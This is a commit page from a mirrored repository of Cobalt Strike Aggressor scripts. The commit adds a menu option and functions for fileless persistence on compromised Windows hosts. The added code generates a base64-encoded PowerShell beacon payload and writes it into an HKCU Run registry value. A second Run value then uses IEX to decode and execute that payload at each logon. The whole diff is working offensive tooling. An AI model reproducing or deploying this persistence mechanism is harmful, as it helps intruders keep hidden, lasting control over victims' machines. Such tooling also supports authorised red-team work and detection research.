infosecn1nja
/
AggressorScripts
mirror of https://github.com/infosecn1nja/AggressorScripts.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added HKCU Persistence method

Logging
Harley Lebeau 2017-07-12 09:59:20 -04:00 committed by GitHub
parent 17f19f0f80
commit 30008d47fc
1 changed files with 56 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

56
Persistence/Persistence_Menu.cna
View File

@ -29,6 +29,12 @@ popup beacon_top {
persistRegistry($bid); persistRegistry($bid);
} }
} }
item "&HKCU Run Key Registry PowerShell Persistence" {
local('$bid');
foreach $bid ($1) {
persistRegistryPowerShell($bid);
}
}
item "&WMI Event Persistence using PowerShell" { item "&WMI Event Persistence using PowerShell" {
local('$bid'); local('$bid');
foreach $bid ($1) { foreach $bid ($1) {
@ -147,6 +153,56 @@ sub persistCustomService {
} }
#HKCU Run Key Registry PowerShell Persistence
#Author: @r3dQu1nn
#Generates a powershell Base64 Encoded payload as a HKCU Run Key Registry Entry for persistence on selected beacon based off a HTTP/HTTPS Listener
#Big thanks to @christruncer and @merrillmatt011 for the help and code snippets
#Fileless Registry Persistence using PowerShell
sub payloadgenerate {
foreach $name (listeners()) {
$original_listener = $name;
$listener_name = lc($name);
if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
$data = artifact($original_listener, "powershell");
return base64_encode($data);
}
}
}
sub persistRegistryPowerShell {
$bid = $1;
$dialog = dialog("HKCU Run Key Registry PowerShell Persistence (User Level)", %(keyname => "Key Name for Payload..", keyname1 => "Key Name to execute Payload.."), lambda({
if ("$3['keyname']" ismatch 'Key Name for Payload..' || "$3['keyname1']" ismatch 'Key Name to execute Payload..') {
berror($bid, "\c4Please enter a valid Registry Key Names, Payload, and a valid Path location.");
break;
}
else {
$data = payloadgenerate($bid);
$powershellcmd = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
bpowershell!($bid, $powershellcmd);
blog($bid, "\cBSetting the first HKCU Run Key Value as '".$3['keyname']."'...");
$powershellcmd1 = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -NoExit -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
bpowershell!($bid, $powershellcmd1);
blog($bid, "\cBSetting the second HKCU Run Key Value as '".$3['keyname1']."'...");
blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");
$powershellcmd2 = "Get-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'";
bpowershell!($bid, $powershellcmd2);
$powershellcmd3 = "Get-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'";
bpowershell!($bid, $powershellcmd3);
}
}));
dialog_description($dialog, "HKCU Run Key Registry PowerShell Persistence - Generates a powershell Base64 Encoded payload as a HKCU Run Key Registry Entry for persistence on selected beacon.");
drow_text($dialog, "keyname", "Registry Key Name for Payload:");
drow_text($dialog, "keyname1", "Registry Key Name to execute Payload:");
dbutton_action($dialog, "Create");
dialog_show($dialog);
}
#Registry Persistence #Registry Persistence
#Author: @r3dQu1nn #Author: @r3dQu1nn
#Depending on Registry Location elevated access might be required #Depending on Registry Location elevated access might be required